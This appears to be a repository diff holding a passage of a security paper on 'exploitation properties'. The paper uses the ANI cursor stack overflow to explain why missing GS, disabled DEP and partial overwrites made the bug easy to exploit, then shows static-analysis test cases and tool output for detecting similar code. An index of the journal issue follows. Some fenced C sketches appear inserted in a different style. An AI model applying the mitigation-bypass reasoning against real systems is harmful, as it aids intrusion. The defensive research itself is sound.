||||
01: int LoadAniIcon(struct MappedFile* file, ...) {
|
||||
02: struct ANIChunk chunk;
|
||||
03: struct ANIHeader header; // 36 byte structure
|
||||
04: while (1) {
|
||||
05: // read the first 8 bytes of the chunk
|
||||
06: ReadTag(file, &chunk);
|
||||
07: switch (chunk.tag) {
|
||||
08: case 'anih':
|
||||
09: // read chunk.size bytes into header
|
||||
10: ReadChunk(file, &chunk, &header);
|
||||
|
||||
On line 6, the chunk header is read into the local variable chunk using
|
||||
ReadTag which populates the chunk's tag and size fields. If the chunk's tag
|
||||
is equal to 'anih', the data associated with the chunk is read into the header
|
||||
local variable using ReadChunk on line 10. The problem is that ReadChunk uses
|
||||
the size field of the chunk as the amount of data to read from the file.
|
||||
Since header is a fixed-size (36 byte) data structure and the chunk's size can
|
||||
be variable, a trivial stack-based buffer overflow may occur if more than 36
|
||||
bytes are specified as the chunk size. In terms of the vulnerability, that's
|
||||
all there is to it, but the implications from an exploitation perspective are
|
||||
where things start to get interesting.
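For contrast, a bounds-checked variant of the read is sketched below. It is
not Microsoft's actual fix and does not reproduce the real ReadChunk
signature; the mapped_file structure and read_chunk_checked are stand-ins
invented for this example. The point is only that the destination capacity
has to take part in the decision, not just the size taken from the file.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ANI_HEADER_SIZE 36   /* size of the fixed header, per the text */

/* Stand-in for the mapped file: a byte buffer and a read cursor. */
struct mapped_file {
    const uint8_t *data;
    size_t size;
    size_t pos;      /* invariant: pos <= size */
};

/*
 * Copy a chunk payload into `dst`, refusing any chunk whose declared size
 * exceeds the destination capacity or the bytes left in the file.
 * Returns 0 on success and -1 on rejection.
 */
int read_chunk_checked(struct mapped_file *file, uint32_t chunk_size,
                       void *dst, size_t dst_capacity)
{
    assert(file != NULL && dst != NULL);
    if (chunk_size > dst_capacity)
        return -1;                    /* would overflow the destination */
    if (chunk_size > file->size - file->pos)
        return -1;                    /* chunk runs past the end of file */
    memcpy(dst, file->data + file->pos, chunk_size);
    file->pos += chunk_size;
    return 0;
}
```

With a 36 byte destination, a declared chunk size of 37 is rejected before
any byte is copied.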
|
||||
|
||||
When attempting to exploit this vulnerability it may at first appear that all
|
||||
attempts to do so would be futile. Given Vista's security push, an attacker
|
||||
would be justified in thinking that surely the LoadAniIcon function is
|
||||
protected by a GS cookie. This point is especially justified considering the
|
||||
majority of all binaries shipped with Windows Vista have been compiled with GS
|
||||
enabled[27]. However, there are indeed circumstances where the compiler will
|
||||
choose to not enable GS for a specific function. As chance would have it, the
|
||||
compiler chose not to enable GS for the LoadAniIcon function because of the
|
||||
simple fact that it does not contain any characteristics that would suggest
|
||||
that a stack-based buffer overflow might be possible (such as the use of
|
||||
stack-allocated arrays). This means that an attacker is able to make use of
|
||||
exploitation techniques that are associated with traditional stack-based
|
||||
buffer overflows. While this drastically increases the chances of being able
|
||||
to produce a reliable exploit, there are still other mitigations that are of
|
||||
potential concern.
|
||||
|
||||
Another mitigation that might be concerning in most circumstances is
|
||||
hardware-enforced DEP (NX). This would generally prevent an attacker from
|
||||
being able to run arbitrary code within regions that are not marked as
|
||||
executable (such as the stack and the heap). However, as fate would have it,
|
||||
Internet Explorer is configured to not run with DEP enabled. This immediately
|
||||
removes this concern from the equation for exploits that attempt to trigger
|
||||
the ANI vulnerability through Internet Explorer. With DEP out of the picture,
|
||||
ASLR becomes a weakened but still potentially significant hurdle.
|
||||
|
||||
While it may appear that ASLR would be challenging to defeat in most
|
||||
circumstances, this particular vulnerability provides an example of two
|
||||
different ways in which ASLR can be bypassed. The simplest approach, as taken
|
||||
by Sotirov, involves making use of the fact that Internet Explorer is not
|
||||
compiled with support for ASLR and therefore can be found at a fixed address
|
||||
within the address space. This allows an attacker to make use of opcodes
|
||||
contained within iexplore.exe's memory mapping. A second approach, as taken
|
||||
by the author, involves using a partial overwrite to ignore the effects of
|
||||
ASLR completely. The details relating to how a partial overwrite works were
|
||||
explained in 2.4.2. In either case, an attacker is able to reliably defeat Vista's
|
||||
ASLR.
|
||||
|
||||
To compound the problem, the particulars of the context in which this
|
||||
vulnerability occurs make it easier to exploit even without the presence of
|
||||
mitigations. This improved reliability comes from the fact that the
|
||||
LoadAniIcon function is wrapped in an exception handling context that simply
|
||||
swallows exceptions that are encountered. This makes it possible for an
|
||||
exploit to fail without actually crashing the process, thus allowing the
|
||||
attacker to try multiple times without having to worry about making a mistake
|
||||
that crashes the process. When all is said and done, the simplicity of the
|
||||
vulnerability and the ease with which mitigations could be bypassed are what
|
||||
led to the ANI vulnerability being quite unique. Given the fact that this
|
||||
vulnerability can be so easily exploited, it is prudent to describe how it
|
||||
could have been detected as being a high risk function.
|
||||
|
||||
3.2) Detection
|
||||
|
||||
The ease of exploitability associated with the ANI vulnerability makes it an
|
||||
obvious candidate for study with respect to the exploitation properties that
|
||||
have been described in this paper. It should be possible to use extremely
|
||||
simple criteria to accomplish two things. First, the criteria must identify
|
||||
the LoadAniIcon function. Second, the criteria should be unique enough to
|
||||
limit the size of the narrowed subset. Reducing the subset size is beneficial
|
||||
as it may permit the use of more complex program analysis tools which can
|
||||
further constrain or explicitly identify instances of vulnerabilities.
|
||||
Determining the specific criteria that are needed to identify the LoadAniIcon
|
||||
function can help illustrate how one can make use of exploitation properties.
|
||||
Given the description of the ANI vulnerability, one can easily deduce some of
|
||||
the more interesting properties that it has.
|
||||
|
||||
An exploitation property that one might immediately observe is that the
|
||||
LoadAniIcon function does not make use of GS (2.4.1). This makes it possible to
|
||||
define a criterion which states that only functions that have not been compiled
|
||||
with GS should be considered. Functions that have been compiled with GS are
|
||||
inherently less interesting for the purpose of this exercise due to the fact
|
||||
that they are less likely to contain exploitable vulnerabilities.
|
||||
|
||||
A second property that the ANI vulnerability had with regard to exploitation
|
||||
was that it was possible for an attacker to make use of a partial overwrite to
|
||||
defeat ASLR. The exploitation property described in 2.4.2 illustrates how one can
|
||||
make this determination statically. In the case of the ANI vulnerability, a
|
||||
partial overwrite can be performed by making use of a jmp [ebx] that is
|
||||
located within the same 16-page aligned region as the caller of LoadAniIcon.
|
||||
Thus, any functions that could potentially make use of a partial overwrite can
|
||||
be used as additional criteria.
|
||||
|
||||
At this point, a subset can be produced that is constrained to the regions of
|
||||
code that are annotated with the GS and partial overwrite exploitation
|
||||
properties. It is possible to further refine the set of functions that should
|
||||
ultimately be considered by studying the form that the ANI vulnerability took.
|
||||
The first point to note is that the stack-based buffer overflow occurred when
|
||||
writing beyond the bounds of a struct that was allocated on the stack.
|
||||
Furthermore, the overflow did not actually occur in the immediate context of
|
||||
LoadAniIcon itself. Instead, the overflow was triggered by passing a
|
||||
pointer to the stack-allocated struct as a parameter when calling the function
|
||||
ReadChunk.
|
||||
|
||||
Based on these data points it is possible to define a third criterion. In this
case, the third criterion is not an exploitation property but is instead an
|
||||
example of a vulnerability property. While not discussed in detail in this
|
||||
paper, many examples of vulnerability properties exist, though perhaps not
|
||||
categorized as such. A vulnerability property can be thought of as an
|
||||
annotation that illustrates whether or not a region of code has a form that is
|
||||
similar to that seen in vulnerabilities or has the potential of being a
|
||||
vulnerability. The complexity of a vulnerability property, as with the
|
||||
complexity of an exploitation property, can range from highly sophisticated to
|
||||
very simplistic.
|
||||
|
||||
For the purpose of this paper, a vulnerability property can be used that is
|
||||
very simple and imprecise but nevertheless effective at further narrowing the
|
||||
set of functions that should be reviewed. This property is based on whether
|
||||
or not a function passes a pointer to a stack-allocated variable as a
|
||||
parameter to a child function. This property is directly derived from the
|
||||
general form that the ANI vulnerability takes. At a minimum, a region of code
|
||||
that matches this form suggests that a vulnerability could be present.
|
||||
|
||||
Using these three properties, it should be possible to easily identify both
|
||||
the function that contains the ANI vulnerability as well as other functions
|
||||
that could contain similar vulnerabilities. However, it is important to note
|
||||
that this process does not produce functions that definitely have
|
||||
vulnerabilities. This can be plainly seen by the fact that both the
|
||||
vulnerable and fixed versions of LoadAniIcon should be detected by the
|
||||
criteria described above. While this may seem to run counter to the purposes
|
||||
of this paper, it is important for the reader to remember that the goal of
|
||||
using these exploitation properties is not to identify specific instances of
|
||||
vulnerabilities. Instead, the goal is to identify regions of code that might
|
||||
warrant additional scrutiny due to the relative ease with which a
|
||||
vulnerability could be exploited if one is found to be present.
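The narrowing step amounts to filtering on a set of property flags. In the
sketch below the flag names and the func_record structure are hypothetical,
and the properties are assumed to have been computed by earlier analysis
passes.

```c
#include <assert.h>
#include <stddef.h>

/* Property flags attached to a function by earlier analysis passes. */
enum {
    PROP_NO_GS              = 1 << 0,  /* exploitation property  */
    PROP_PARTIAL_OVERWRITE  = 1 << 1,  /* exploitation property  */
    PROP_STACK_PTR_TO_CHILD = 1 << 2   /* vulnerability property */
};

struct func_record {
    const char *name;
    unsigned    props;
};

/*
 * Keep only the functions that carry every property in `required`.
 * Matching records are compacted to the front of `funcs` and the new
 * length is returned.
 */
size_t narrow(struct func_record *funcs, size_t n, unsigned required)
{
    size_t kept = 0;
    assert(funcs != NULL || n == 0);
    for (size_t i = 0; i < n; i++)
        if ((funcs[i].props & required) == required)
            funcs[kept++] = funcs[i];
    return kept;
}
```

As the text notes, both a vulnerable and a fixed version of a function would
survive this filter; the output is a review list and not a list of bugs.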
|
||||
|
||||
3.3) Test Case
|
||||
|
||||
The author developed an analysis tool as an extension to Microsoft's Phoenix
|
||||
framework in order to test the ideas described in this paper[12]. Unfortunately,
|
||||
the current release (July 2007 SDK) of Phoenix requires private symbol
|
||||
information for native binaries. This limitation prevented the author from
|
||||
being able to run the analysis tool across the vulnerable version of
|
||||
user32.dll. In lieu of this ability, the author chose to generate a binary
|
||||
containing test cases that closely mirror the form of the function containing
|
||||
the ANI vulnerability.
|
||||
|
||||
Using these test cases, the author used the features provided by the analysis
|
||||
tool to determine the exploitation and vulnerability properties described in
|
||||
the previous section and to identify the resulting subset of functions meeting
|
||||
all criteria. This was accomplished by first attempting to identify the
|
||||
subset of functions that do not contain GS within the scope of the target
|
||||
binary. After identifying the subset of functions without GS, a second subset
|
||||
was taken which consists of the functions that pass a pointer to a
|
||||
stack-allocated local variable as a parameter to a child routine. This was
|
||||
accomplished by using Phoenix's static single assignment (SSA) and alias
|
||||
implementations to collect the requisite data flow information[12,25]. Using this
|
||||
data flow information, it is possible to perform backwards data flow analysis
|
||||
to determine the potential storage location of the parameter being passed at
|
||||
each point along a given data flow path starting from the operand associated
|
||||
with a parameter at a call site. The analysis terminates either when a fixed
|
||||
point is reached or when it is determined that a pointer to a stack-allocated
|
||||
variable could be passed as the parameter.
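The backwards walk can be illustrated on a toy intermediate form. The sketch
below is not Phoenix code and uses none of its API: each value has a single
definition, only direct copies are followed, and aliasing through structure
fields (which the real analysis has to handle) is left out. All names are
hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* How a value in a toy SSA-like form was defined. */
enum def_kind {
    DEF_ADDR_OF_LOCAL,  /* p = &stack_local                          */
    DEF_COPY,           /* p = q (src names q)                       */
    DEF_OTHER           /* constant, load, heap pointer, parameter   */
};

struct def {
    enum def_kind kind;
    size_t src;         /* defining value for DEF_COPY, unused otherwise */
};

/*
 * Walk backwards from the value used as a call argument until its origin is
 * known. Returns 1 if the argument may be a pointer to a stack local and 0
 * otherwise. The step limit guards against cycles in malformed input.
 */
int arg_is_stack_local_ptr(const struct def *defs, size_t n_defs, size_t arg)
{
    assert(defs != NULL);
    for (size_t steps = 0; steps < n_defs && arg < n_defs; steps++) {
        switch (defs[arg].kind) {
        case DEF_ADDR_OF_LOCAL:
            return 1;
        case DEF_COPY:
            arg = defs[arg].src;   /* follow the alias one step back */
            break;
        default:
            return 0;
        }
    }
    return 0;
}
```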
|
||||
|
||||
While the previous section described the potential for using the partial
|
||||
overwrite exploitation property to detect the function containing the ANI
|
||||
vulnerability[6], it is not possible to create a meaningful parallel between the
|
||||
test binary and that of the ANI vulnerability. This is due in part to the
|
||||
fact that while it would certainly be possible to artificially place a useful
|
||||
opcode at a specific location in the test binary, it would not add any value
|
||||
beyond showing that it is possible to detect useful opcodes within the same
|
||||
16-page aligned region as the caller of a given function. The author feels
|
||||
that this point is somewhat moot given the fact that it has already been
|
||||
proven that a partial overwrite can be used with the ANI vulnerability. The
|
||||
only additional benefit that it could offer in this case would be to help
|
||||
further constrain the resultant set size. However, without being able to run
|
||||
this analysis against the vulnerable version of user32.dll, it is not possible
|
||||
to draw meaningful conclusions at this point in time.
|
||||
|
||||
3.4) Results
|
||||
|
||||
The results of running the analysis tool against the test binary produced the
|
||||
expected behavior. To illustrate this, it is helpful to consider a sampling
|
||||
of the functions that were analyzed. The following functions have a form that
|
||||
is similar to the ANI vulnerability. These functions also match the criteria
|
||||
described in the previous subsection. Specifically, these functions do not
|
||||
make use of GS and pass a pointer to a stack-allocated local variable (var) to
|
||||
a child function:
|
||||
|
||||
int tc_df_pass_local_ptr_to_callee() {
|
||||
int var;
|
||||
tc_df_pass_local_ptr_to_callee_func(&var);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_ptr_to_callee_alias() {
|
||||
int var;
|
||||
int *p = &var;
|
||||
tc_df_pass_local_ptr_to_callee_func(p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_ptr_to_callee_alias_struct(
|
||||
struct _foo *foo) {
|
||||
int var;
|
||||
foo->ptr = &var;
|
||||
return tc_df_pass_local_ptr_to_callee_func(
|
||||
foo->ptr);
|
||||
return 0;
|
||||
}
|
||||
|
||||
Additionally, a handful of different test functions were also included in the
|
||||
target binary in an effort to ensure that other scenarios were not improperly
|
||||
detected as matching the criteria. Some examples of these functions include:
|
||||
|
||||
int tc_df_pass_local_to_callee_alias() {
|
||||
int var = 2;
|
||||
int p = var;
|
||||
tc_df_pass_local_to_callee_func(p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_to_callee_deref() {
|
||||
int var = 2;
|
||||
int *p = &var;
|
||||
tc_df_pass_local_to_callee_func(*p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) {
|
||||
tc_df_pass_local_ptr_to_callee_func(&foo->val);
|
||||
return 0;
|
||||
}
|
||||
|
||||
When running the analysis tool against the target binary, the following output
|
||||
is shown:
|
||||
|
||||
>PhaseRunner.exe detectani.xml dfa.exe
|
||||
Running phase: ANI Detection ... 1 target(s)
|
||||
|
||||
Displaying 3 normalizables at the
|
||||
ProgramElement.Method granularity...
|
||||
|
||||
00001: dfa!tc_df_pass_local_ptr_to_callee_alias
|
||||
00002: dfa!tc_df_pass_local_ptr_to_callee
|
||||
00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct
|
||||
|
||||
While this unfortunately does not prove that these techniques could be used to
|
||||
identify the function containing the ANI vulnerability, it does nevertheless
|
||||
hint at the potential for detecting that function using its suggested
|
||||
exploitation and vulnerability properties.
|
||||
As an aside, another interesting way in which this type of detection can be
|
||||
accomplished is through the use of Language Integrated Queries (LINQ) which
|
||||
are now supported in Visual Studio 2008[11]. For instance, a simple LINQ
|
||||
expression for the above narrowing operation can be expressed as:
|
||||
|
||||
var matches =
|
||||
from
|
||||
Method method in engine.GetScopeMethods()
|
||||
where
|
||||
!method.IsGuardStackEnabled() &&
|
||||
method.IsPassingStackLocalPtrToChild()
|
||||
select method;
|
||||
|
||||
foreach (var method in matches)
|
||||
Console.WriteLine("{0} matches", method);
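
The same narrowing operation can be sketched in plain C, assuming the two properties have already been extracted for each function. The `func_props` record and the `narrow_ani_like` helper are hypothetical names used only for illustration; they are not part of the analysis tool described above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical per-function record. The field names are illustrative and
 * are assumed to have been filled in by an earlier analysis pass. */
struct func_props {
    const char *name;
    bool gs_enabled;              /* function is protected by a GS cookie  */
    bool passes_stack_local_ptr;  /* passes a pointer to a stack local to a
                                     child function                        */
};

/* Store pointers to the records that match both criteria in out, which
 * must have room for count entries. Returns the number of matches. */
size_t narrow_ani_like(const struct func_props *funcs, size_t count,
                       const struct func_props **out)
{
    size_t matched = 0;

    assert(funcs != NULL && out != NULL);

    for (size_t i = 0; i < count; i++) {
        /* Same predicate as the LINQ where clause: no GS, and a pointer
         * to a stack-allocated local is handed to a callee. */
        if (!funcs[i].gs_enabled && funcs[i].passes_stack_local_ptr)
            out[matched++] = &funcs[i];
    }
    return matched;
}
```

A caller would fill an array of `func_props` records, pass it in along with an output array of the same length, and then print the name of each returned match.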
|
||||
|
||||
4) Potential Uses
|
||||
|
||||
Program analysis is one area that may benefit from the use of exploitation
|
||||
properties. In particular, an auditor can make use of exploitation properties
|
||||
to assist in the process of identifying regions of code that should be audited
|
||||
more closely or with greater precedence. This determination can be made by
|
||||
using exploitation properties to understand the ease of exploitation
|
||||
associated with specific binaries or functions. By combining this information
|
||||
with other data that is collected either manually or automatically, an auditor
|
||||
can get a better understanding of the security aspects that are associated
|
||||
with a system. This is beneficial both to an attacker and a defender. An
|
||||
attacker can identify regions of code that would be easier to exploit and thus
|
||||
devote more time to auditing those regions. Likewise, a defender can use this
|
||||
information to the same extent but for different purposes. This type of
|
||||
information is especially useful to a defender who needs to balance the cost
|
||||
associated with performing security reviews because it should offer a better
|
||||
understanding of what the business cost might be if a vulnerability is found
|
||||
in a region of code. This cost can be derived from the negative publicity and
|
||||
response effort needed to cope with a flaw that is found publicly in a region
|
||||
of code that is widely exploited. For example, consider some of the Windows
|
||||
flaws that have led to wormable issues and the cost they have had relative to
|
||||
other issues.
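
One way to picture this kind of prioritization is to order functions by how easily they could be exploited. The following is a minimal sketch under stated assumptions: the `audit_item` record and its `exploit_ease` score (for instance, a count of exploitation properties that favor an attacker) are hypothetical, and the paper does not define such a metric.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical audit record. exploit_ease is an assumed score where a
 * higher value means the function would be easier to exploit. */
struct audit_item {
    const char *name;
    unsigned exploit_ease;
};

/* qsort comparator: orders items from highest to lowest exploit_ease. */
static int by_ease_desc(const void *a, const void *b)
{
    const struct audit_item *x = a;
    const struct audit_item *y = b;

    return (x->exploit_ease < y->exploit_ease) -
           (x->exploit_ease > y->exploit_ease);
}

/* Sort the audit queue in place so the most easily exploited functions
 * are reviewed first. */
void prioritize_audit(struct audit_item *items, size_t count)
{
    assert(items != NULL);
    qsort(items, count, sizeof items[0], by_ease_desc);
}
```

In practice the score would be combined with other data, such as attack surface exposure, before deciding what to audit first.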
|
||||
|
||||
Exploitation properties may also benefit the security community by helping to
|
||||
identify ways in which future mitigations can be applied. This would involve
|
||||
analyzing regions of code that could be more easily exploited in an effort to
|
||||
determine what other forms of mitigations could help to protect these regions,
|
||||
if any. This information could be fed back to the compiler to make it
|
||||
possible for mitigations to be enabled that might otherwise be disabled by
|
||||
default. For example, a function that by default would not have GS but is
|
||||
subsequently found to be highly exploitable may benefit from having the
|
||||
compiler insert GS.
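
The feedback decision described here can be sketched as a simple predicate. This is only an illustration: `func_summary`, `exploit_score`, and the threshold are hypothetical, and no claim is made that any compiler exposes such an interface.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical summary of one function as seen by the feedback step. */
struct func_summary {
    bool gs_by_default;      /* compiler heuristics already insert GS    */
    unsigned exploit_score;  /* assumed score; higher = more exploitable */
};

/* Returns true when GS should be forced on: the function would not get
 * GS by default, yet its score meets or exceeds the chosen threshold. */
bool should_force_gs(const struct func_summary *f, unsigned threshold)
{
    assert(f != NULL);
    return !f->gs_by_default && f->exploit_score >= threshold;
}
```

Functions that already receive GS are left alone, so the predicate only ever widens coverage.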
|
||||
|
||||
5) Future Work
|
||||
|
||||
While this paper has defined exploitation properties and described a handful
|
||||
of concrete examples, it has not attempted to formally define the correlation
|
||||
between exploitation properties and the exploitation techniques they are
|
||||
associated with. Future research will attempt to concretely define this
|
||||
relationship as it should lead to a better understanding of the variables that
|
||||
permit the use of various exploitation techniques. Using more formal
|
||||
definitions of exploitation properties, a larger scale case study can be
|
||||
completed which collects data about the effect of using exploitation
|
||||
properties to improve program understanding for a variety of purposes. The
|
||||
author views exploitation properties as being one component in a larger model.
|
||||
This larger model could be used to join major areas of study within computer
|
||||
security including attack surface analysis, vulnerability analysis, and
|
||||
exploitation analysis to form a more complete understanding of the true risks
|
||||
associated with a system.
|
||||
|
||||
6) Conclusion
|
||||
|
||||
This paper has introduced the general concept of exploitation properties and
|
||||
described how they can be used to better understand the exploitability of a
|
||||
system. The purpose of an exploitation property is to help convey the ease
|
||||
with which a vulnerability might be exploited if one is found to be present.
|
||||
Exploitation properties can be broken down into different categories based on
|
||||
the configuration or context that a given property is associated with. These
|
||||
categories include operating platforms, running processes, binary modules, and
|
||||
functions.
|
||||
|
||||
Exploitation properties can be used to provide an alternative understanding of
|
||||
an application's attack surface from the perspective of which areas would be
|
||||
most trivially exploited. This can allow an attacker to focus on finding
|
||||
security issues in code that would be more easily exploited. Likewise, a
|
||||
defender can draw the same conclusions and direct resources of their own at
|
||||
reviewing the associated code. It may also be possible to use this
|
||||
information to augment existing mitigations or to come up with new
|
||||
mitigations. A contrived example based on the form of the ANI vulnerability
|
||||
was used to illustrate an automated approach to extracting exploitation
|
||||
properties and using them to help identify a constrained subset of regions of
|
||||
code that meet specific criteria. Future research will attempt to better
|
||||
define the extent of exploitation properties and their uses.
|
||||
|
||||
[1] Dowd, M., Mehta, N., McDonald, J. Breaking C++ Applications.
|
||||
https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf
|
||||
|
||||
[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002.
|
||||
http://www.phrack.org/issues.html?issue=59&id=9
|
||||
|
||||
[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
|
||||
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx
|
||||
|
||||
[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures.
|
||||
http://rjohnson.uninformed.org/
|
||||
|
||||
[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention
|
||||
Mechanism of Microsoft Windows 2003 Server.
|
||||
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
|
||||
|
||||
[6] Metasploit. Exploiting the ANI vulnerability on Vista.
|
||||
http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html
|
||||
|
||||
[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005.
|
||||
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
|
||||
|
||||
[8] Microsoft Corporation. /GS (Buffer Security Check).
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx
|
||||
|
||||
[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
|
||||
http://msdn2.microsoft.com/en-us/library/9a89h429.aspx
|
||||
|
||||
[10] Microsoft Corporation. A detailed description of the Data Execution
|
||||
Prevention (DEP) feature. http://support.microsoft.com/kb/875352
|
||||
|
||||
[11] Microsoft Corporation. The LINQ Project.
|
||||
http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx
|
||||
|
||||
[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/
|
||||
|
||||
[13] Microsoft Corporation. Microsoft Portable Executable and Object File
|
||||
Format Specification.
|
||||
http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc
|
||||
|
||||
[14] Microsoft Corporation. Threat Modeling. June, 2003.
|
||||
http://msdn2.microsoft.com/en-us/library/aa302419.aspx
|
||||
|
||||
[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt
|
||||
|
||||
[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
|
||||
http://www.cigital.com/news/index.php?pg=art&artid=70
|
||||
|
||||
[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006.
|
||||
http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf
|
||||
|
||||
[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP.
|
||||
http://www.uninformed.org/?v=2&a=4&t=sumry
|
||||
|
||||
[19] skape. Preventing the Exploitation of SEH Overwrites.
|
||||
http://www.uninformed.org/?v=5&a=2&t=sumry
|
||||
|
||||
[20] skape. Reducing the Effective Entropy of GS Cookies.
|
||||
http://www.uninformed.org/?v=7&a=2&t=sumry
|
||||
|
||||
[21] Skywing. Vista ASLR is not on by default for image base addresses.
|
||||
http://www.nynaeve.net/?p=100
|
||||
|
||||
[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow
|
||||
Vulnerability. March, 2007.
|
||||
http://www.determina.com/security.research/vulnerabilities/ani-header.html
|
||||
|
||||
[23] Wikipedia. Stack-smashing protection.
|
||||
http://en.wikipedia.org/wiki/Stack-smashing_protection
|
||||
|
||||
[24] Wikipedia. Address space layout randomization.
|
||||
http://en.wikipedia.org/wiki/ASLR
|
||||
|
||||
[25] Wikipedia. Static single assignment form.
|
||||
http://en.wikipedia.org/wiki/Static_single_assignment_form
|
||||
|
||||
[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page.
|
||||
http://www.cs.wisc.edu/wpis/html/
|
||||
|
||||
[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows
|
||||
Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf
|
22
uninformed/9.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
Engineering in Reverse
|
||||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
Skywing
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks were introduced that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
ActiveX - Active Exploitation
|
||||
warlord
|
||||
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
|
||||
html | pdf | txt
|
||||
|
||||
Context-keyed Payload Encoding
|
||||
I)ruid
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked, and may also open up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic, however, should be unable to decode the payload due to lack of the contextual keying information.
|
||||
html | pdf | txt
|
||||
|
||||
Improving Software Security Analysis using Exploitation Properties
|
||||
skape
|
||||
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
|
||||
html | pdf | txt
|
||||
|
BIN
uninformed/code.1.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.1.4.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.2.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.3.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.3.6.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.4.4.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.7.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.7.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.4.zip
Normal file
Binary file not shown.
BIN
uninformed/code.8.6.tgz
Normal file
Binary file not shown.